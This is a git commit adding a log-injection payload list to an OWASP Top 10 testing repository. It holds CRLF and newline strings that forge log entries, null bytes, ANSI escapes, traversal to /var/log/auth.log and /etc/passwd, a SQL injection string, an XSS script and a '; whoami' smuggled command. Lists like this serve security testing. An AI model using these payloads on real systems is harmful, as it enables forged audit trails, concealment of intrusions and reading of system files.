Add comprehensive OWASP Top 10 directory structure with injection payloads

Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>

OWASP-Top-10/A09-Security-Logging-Monitoring-Failures/log-injection-payloads.txt

@@ -0,0 +1,50 @@
+# Log Injection Payloads
+
+# CRLF injection in logs
+\r\n
+\r\nUser: admin logged in successfully
+%0d%0a
+%0d%0aAuthentication successful for admin
+
+# Log poisoning
+\nuser=admin authenticated=true\n
+\r\nSUCCESS: Admin login\r\n
+%0auser:admin%0astatus:success%0a
+
+# Log format manipulation
+admin\nAuthenticated:true
+test\r\nRole:administrator
+
+# Time-based log injection
+[2023-01-01 00:00:00] User admin logged in successfully
+[CRITICAL] Unauthorized access detected
+
+# Null byte injection in logs
+admin\x00
+user\x00admin
+
+# ANSI escape sequences (log injection)
+\x1b[31mCRITICAL\x1b[0m
+\033[1;31mALERT\033[0m
+
+# Log file path traversal
+../../logs/application.log
+/var/log/auth.log
+../../../var/log/syslog
+
+# Events that should be logged (test if they're logged)
+- Failed login attempts
+- Successful login
+- Password changes
+- Privilege escalation
+- Administrative actions
+- Access to sensitive data
+- Invalid input
+- Authentication failures
+- Authorization failures
+
+# Events to check in logs
+SELECT * FROM users WHERE username='admin' AND password='wrong'
+<script>alert('XSS')</script>
+../../../etc/passwd
+; whoami